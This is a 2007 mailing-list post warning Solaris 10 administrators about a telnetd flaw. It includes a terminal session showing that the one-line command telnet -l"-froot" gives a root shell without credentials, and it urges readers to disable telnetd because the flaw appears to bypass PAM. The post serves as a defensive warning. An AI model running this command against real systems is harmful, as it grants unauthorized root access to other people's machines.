[rescue] Solaris 10 Remote-Root Exploit

Jonathan C. Patschke jp at celestrion.net
Mon Feb 12 07:45:40 CST 2007

Just saw this on Slashdot:


And verified that it works:

   [jp at cobra:~]$ telnet -l"-froot" lic4
   Connected to lic4.centtech.com.
   Escape character is '^]'.
   Last login: Wed Jan 17 16:53:28 from hal10.centtech.
   Sun Microsystems Inc.   SunOS 5.10      Generic January 2005
   You have mail.
   # Connection closed by foreign host.
   [jp at cobra:~]$ exit
   Connection to cobra.centtech.com closed.

If you have any public-facing systems running Solaris's telnetd, you
should disable it now.  Even turning off remote root logins is
insufficient, since this seems to bypass PAM.

Jonathan Patschke ) "I would buy a Mac today if I was not working at
Elgin, TX        (   Microsoft."      --Jim Allchin, VP of Platforms

More information about the rescue mailing list